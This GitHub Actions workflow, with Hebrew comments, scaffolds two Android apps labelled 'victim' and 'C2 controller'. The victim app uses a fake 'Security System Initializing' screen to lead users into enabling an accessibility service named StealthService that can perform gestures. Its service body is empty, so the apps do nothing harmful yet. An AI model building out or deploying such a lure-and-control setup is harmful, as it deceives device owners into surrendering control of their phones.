name: Mobile Research Build
on: [push, workflow_dispatch]

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Set up JDK 17
        uses: actions/setup-java@v4
        with:
          java-version: '17'
          distribution: 'temurin'

      - name: Create Structure and Code
        run: |
          # יצירת מבנה תיקיות
          mkdir -p victim/src/main/java/com/research/lab/victim
          mkdir -p victim/src/main/res/xml
          mkdir -p controller/src/main/java/com/research/lab/controller

          # הגדרות פרויקט
          echo "include ':victim', ':controller'" > settings.gradle
          
          cat <<EOF > build.gradle
          buildscript {
              repositories { google(); mavenCentral() }
              dependencies { classpath 'com.android.tools.build:gradle:8.1.0' }
          }
          allprojects {
              repositories { google(); mavenCentral() }
          }
          EOF

          # הגדרות אפליקציית הקרבן
          cat <<EOF > victim/build.gradle
          plugins { id 'com.android.application' }
          android {
              namespace 'com.research.lab.victim'
              compileSdk 33
              defaultConfig { applicationId "com.research.lab.victim"; minSdk 24; targetSdk 33 }
          }
          EOF

          # הגדרות אפליקציית השליטה
          cat <<EOF > controller/build.gradle
          plugins { id 'com.android.application' }
          android {
              namespace 'com.research.lab.controller'
              compileSdk 33
              defaultConfig { applicationId "com.research.lab.controller"; minSdk 24; targetSdk 33 }
          }
          EOF

          # הזרקת קוד Java - Victim
          cat <<'EOF' > victim/src/main/java/com/research/lab/victim/VictimApp.java
          package com.research.lab.victim;
          import android.accessibilityservice.AccessibilityService;
          import android.app.Activity;
          import android.content.Intent;
          import android.os.Bundle;
          import android.os.Handler;
          import android.os.Looper;
          import android.view.View;
          import android.view.accessibility.AccessibilityEvent;
          import android.widget.Button;
          import android.widget.LinearLayout;
          import android.widget.TextView;

          public class VictimApp {
              public static class LoadingActivity extends Activity {
                  @Override
                  protected void onCreate(Bundle savedInstanceState) {
                      super.onCreate(savedInstanceState);
                      LinearLayout layout = new LinearLayout(this);
                      layout.setOrientation(LinearLayout.VERTICAL);
                      TextView tv = new TextView(this);
                      tv.setText("Security System Initializing...");
                      layout.addView(tv);
                      Button btn = new Button(this);
                      btn.setText("Enable Service");
                      btn.setOnClickListener(v -> startActivity(new Intent(android.provider.Settings.ACTION_ACCESSIBILITY_SETTINGS)));
                      layout.addView(btn);
                      setContentView(layout);
                  }
              }
              public static class StealthService extends AccessibilityService {
                  @Override public void onAccessibilityEvent(AccessibilityEvent event) {}
                  @Override public void onInterrupt() {}
              }
          }
          EOF

          # הזרקת קוד Java - Controller
          cat <<'EOF' > controller/src/main/java/com/research/lab/controller/ControllerApp.java
          package com.research.lab.controller;
          import android.app.Activity;
          import android.os.Bundle;
          import android.widget.TextView;

          public class ControllerApp extends Activity {
              @Override
              protected void onCreate(Bundle savedInstanceState) {
                  super.onCreate(savedInstanceState);
                  TextView tv = new TextView(this);
                  tv.setText("C2 Controller Active");
                  setContentView(tv);
              }
          }
          EOF

          # יצירת המניפסטים
          cat <<EOF > victim/src/main/AndroidManifest.xml
          <manifest xmlns:android="http://schemas.android.com/apk/res/android">
              <application>
                  <activity android:name=".VictimApp\$LoadingActivity" android:exported="true">
                      <intent-filter><action android:name="android.intent.action.MAIN" /><category android:name="android.intent.category.LAUNCHER" /></intent-filter>
                  </activity>
                  <service android:name=".VictimApp\$StealthService" android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE" android:exported="true">
                      <intent-filter><action android:name="android.accessibilityservice.AccessibilityService" /></intent-filter>
                      <meta-data android:name="android.accessibilityservice" android:resource="@xml/acc_config" />
                  </service>
              </application>
          </manifest>
          EOF
          echo '<accessibility-service xmlns:android="http://schemas.android.com/apk/res/android" android:accessibilityFlags="flagDefault" android:canPerformGestures="true" />' > victim/src/main/res/xml/acc_config.xml

          cat <<EOF > controller/src/main/AndroidManifest.xml
          <manifest xmlns:android="http://schemas.android.com/apk/res/android">
              <application><activity android:name=".ControllerApp" android:exported="true">
                  <intent-filter><action android:name="android.intent.action.MAIN" /><category android:name="android.intent.category.LAUNCHER" /></intent-filter>
              </activity></application>
          </manifest>
          EOF

      - name: Build with Gradle
        run: |
          # שימוש בגרסת Gradle יציבה (8.0) במקום 9.2.1 שגרמה לשגיאה
          gradle wrapper --gradle-version 8.0
          chmod +x gradlew
          ./gradlew assembleDebug --no-daemon

      - name: Upload APKs
        uses: actions/upload-artifact@v4
        with:
          name: mobile-research-apks
          path: "**/build/outputs/apk/debug/*.apk"
          
